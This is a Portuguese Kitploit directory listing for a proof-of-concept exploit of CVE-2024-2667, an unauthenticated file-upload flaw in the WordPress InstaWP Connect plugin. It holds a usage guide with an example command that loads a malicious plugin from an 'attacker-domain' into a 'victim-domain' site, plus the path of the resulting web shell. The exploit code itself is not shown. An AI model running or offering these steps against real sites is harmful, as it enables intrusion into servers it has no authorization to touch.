Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-2667-Poc — Exploit PoC para CVE-2024-2667: upload automatizado de arquivos arbitrários e acesso a shell por meio de validação insuficiente de arquivos no endpoint da API REST do plugin InstaWP Connect do WordPress. | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2024-2667-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubnxploited/cve-2024-2667-poc

CVE-2024-2667-Poc

Exploit PoC para CVE-2024-2667: upload automatizado de arquivos arbitrários e acesso a shell por meio de validação insuficiente de arquivos no endpoint da API REST do plugin InstaWP Connect do WordPress.

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-2667-Poc 🚀

Descrição

O plugin InstaWP Connect – 1-click WP Staging & Migration para WordPress é vulnerável a upload arbitrário de arquivos devido à validação insuficiente de arquivos no endpoint da API REST /wp-json/instawp-connect/v1/config em todas as versões até, e incluindo, 0.1.0.22. Isso possibilita que atacantes não autenticados façam upload de arquivos arbitrários.

Guia de Uso do Script ⚙️

Requisitos de Instalação

DescriçãoDetalhesÍcone
Instalar Bibliotecas NecessáriasUse pip para instalar as bibliotecas Python necessárias: requests e beautifulsoup4.🛠️
Comando para InstalarExecute: pip install requests beautifulsoup4.📥

Executar o Script

DescriçãoDetalhesÍcone
Executar o ScriptExecute o script usando a linha de comando com os argumentos necessários.🚀
Argumentos Necessários- -up: URL do plugin (ex.: http://attacker-domain/malicious-plugin.zip).
- -u: URL do WordPress de destino (ex.: http://victim-domain/).🔧
Comando de Exemplopython CVE-2024-2667.py -up http://attacker-domain/malicious-plugin.zip -u http://victim-domain/📜

Verificar Vulnerabilidade

DescriçãoDetalhesÍcone
Verificação de VersãoO script examina o arquivo readme.txt para verificar a versão do plugin alvo.🔍
Versão VulnerávelSe a versão for <= 0.1.0.22, o script exibe: The site is vulnerable.⚠️
Versão SeguraSe a versão for > 0.1.0.22, o script exibe: The site is not vulnerable.✅

Localização do Shell

DescriçãoDetalhesÍcone
Caminho do ShellSe o upload for bem-sucedido, o shell estará acessível em:🐚
wp-content/plugins/instawp-connect/shell.php.

uso -help

root@kitploit:~
usage: CVE-2024-2667.py [-h] -up URL_PLUGIN -u URL_TARGET

The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due
to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and
including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.

options:
  -h, --help            show this help message and exit
  -up URL_PLUGIN, --url_plugin URL_PLUGIN
                        URL of the plugin (e.g., http://attacker-domain/malicious-plugin.zip).
  -u URL_TARGET, --url_target URL_TARGET
                        URL of the target WordPress site (e.g., http://victim-domain/).
Baixar ferramenta